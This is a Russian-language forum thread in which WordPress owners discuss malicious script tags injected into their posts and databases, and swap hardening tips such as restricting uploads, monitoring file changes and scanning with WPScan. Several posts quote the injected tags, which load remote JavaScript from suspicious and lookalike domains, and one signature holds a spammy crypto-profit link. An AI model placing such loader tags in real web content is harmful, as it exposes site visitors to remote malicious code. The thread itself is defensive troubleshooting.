Появился скрипт в статьях на Wordpress

Santa24
На сайте с 01.11.2009
Offline
48
#41

Также обнаружил в БД на сайтах. Все сайты на хосте WP были засраны.

(случайно пост редактировал и обнаружил).

<script src="//wollses.com/steps.png"></script>

<script src="//wollses.com/steps"></script>

<script src="//uptoliked.ru/widjets.js"></script>

<script src="//youtuibes.com/watch"></script>

<script src="//pngme.ru/seter"></script>

<script type="text/javascript" src="//shareup.ru/social.js"></script>

<script src="//shareup.ru/social.js"></script>

<script type="text/javascript" src="//wq4.ru/js.js"></script>

<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>

<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>

<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>

Запросами почистил, посмотрю через несколько дней.

A
На сайте с 27.07.2010
Offline
71
#42
Santa24:
Также обнаружил в БД на сайтах. Все сайты на хосте WP были засраны.
(случайно пост редактировал и обнаружил).

<script src="//wollses.com/steps.png"></script>
<script src="//wollses.com/steps"></script>
<script src="//uptoliked.ru/widjets.js"></script>
<script src="//youtuibes.com/watch"></script>
<script src="//pngme.ru/seter"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>
<script src="//shareup.ru/social.js"></script>
<script type="text/javascript" src="//wq4.ru/js.js"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>

Запросами почистил, посмотрю через несколько дней.

Такая чистка не помогает.

A
На сайте с 27.07.2010
Offline
71
#43

Удалил код с записей, затем скачал базу и просканировал на наличие того же кода. Оказалось, что в базе он сидит. Удалил его с базы. Посмотрим, что будет дальше.

OneF
На сайте с 09.06.2007
Offline
173
#44

Кто посоветует рабочее решение? может подскажите ссылку где описано решение.

Заранее спасибо!

Устали делать сайты? Просто пассивный доход - Успей сделать до 1000% на криптовалюте! (https://goo.gl/eTwSwK)
SeVlad
На сайте с 03.11.2008
Offline
1609
#45
OneF:
Кто посоветует рабочее решение?

Решение чего?

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
двакарандашавнос
На сайте с 10.09.2009
Offline
75
#46
OneF:
Кто посоветует рабочее решение? может подскажите ссылку где описано решение.
Заранее спасибо!

Рабочее решение - закрывать все дыры на сайте. От того, что удалили сам код из записей - дыры от этого не закрылись, и уже завтра, послезавтра, может через неделю через них вам снова закинут эти строки в посты.

OneF
На сайте с 09.06.2007
Offline
173
#47
SeVlad:
Решение чего?

Спасибо что откликнулись.

Уточню, интересуют 2 момента:

1. через какую дыру в вордпресс этот код вставляют? если уже кто разобрался!

2. как кроме обновления до последней версии, уберечь сайт после чистки? если можно то пожалуйста по шагам напишите, думаю будет полезно очень многим пользователям и тому кто подробно напишет будет огромный + в карму от всех кому он помог.

Заранее спасибо!

---------- Добавлено 09.11.2015 в 19:25 ----------

двакарандашавнос, аналогично вопросы выше, закрывать дыры это общий совет который никакой пользы не несет, если знаете какие дыры закрывать нужно как минимум, пишите тут.

Den73
На сайте с 26.06.2010
Offline
523
#48
OneF:
Спасибо что откликнулись.
Уточню, интересуют 2 момента:
1. через какую дыру в вордпресс этот код вставляют? если уже кто разобрался!
2. как кроме обновления до последней версии, уберечь сайт после чистки? если можно то пожалуйста по шагам напишите, думаю будет полезно очень многим пользователям и тому кто подробно напишет будет огромный + в карму от всех кому он помог.

Заранее спасибо!

1. необходимо проводить аудит, исходя из предоставленной вами информации невозможно делать какие либо выводы.

2. чистка это не решение проблемы. нужно обязательно определить источник, по шагам написать невозможно т.к ситуации бывают разные.

без тех. навыков вы не сможете решить проблему, дешевле обратиться к специалистам.

SeVlad
На сайте с 03.11.2008
Offline
1609
#49
OneF:
через какую дыру в вордпресс этот код вставляют?

Ну раз речь о ВП я просто дам ссылку на недавний топик.

:)

двакарандашавнос
На сайте с 10.09.2009
Offline
75
#50

двакарандашавнос, аналогично вопросы выше, закрывать дыры это общий совет который никакой пользы не несет, если знаете какие дыры закрывать нужно как минимум, пишите тут.

Да там тьма-тьмущая пунктов, что надо сделать на сайте, чтобы закрыть дыры:

менять id администратора, префик таблицы БД, менять папку с wp-content на другую, запрещать загрузку любых файлов кроме изображений, менять адрес входа в админку, ставить защиту от брутфорса, ставить уведомления об изменениях в php файлах, ставить права 444 на критичные файлы, смотреть какие плагины устаревшие, в некоторых есть хорошо известные всем уязвимости, но плагины уже не обновляются и не поддерживаются и т.д. и т.п. Пунктов под 40, что требуется сделать для закрытия дыр. Смотреть логи, когда были изменены какие файлы, каким образом это было сделано.

Если есть опыт в Линеусе, лучше всего установить OC Kali Linux - на неё поставить WPScan и проверить свой сайт на всевозможные уязвимости.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий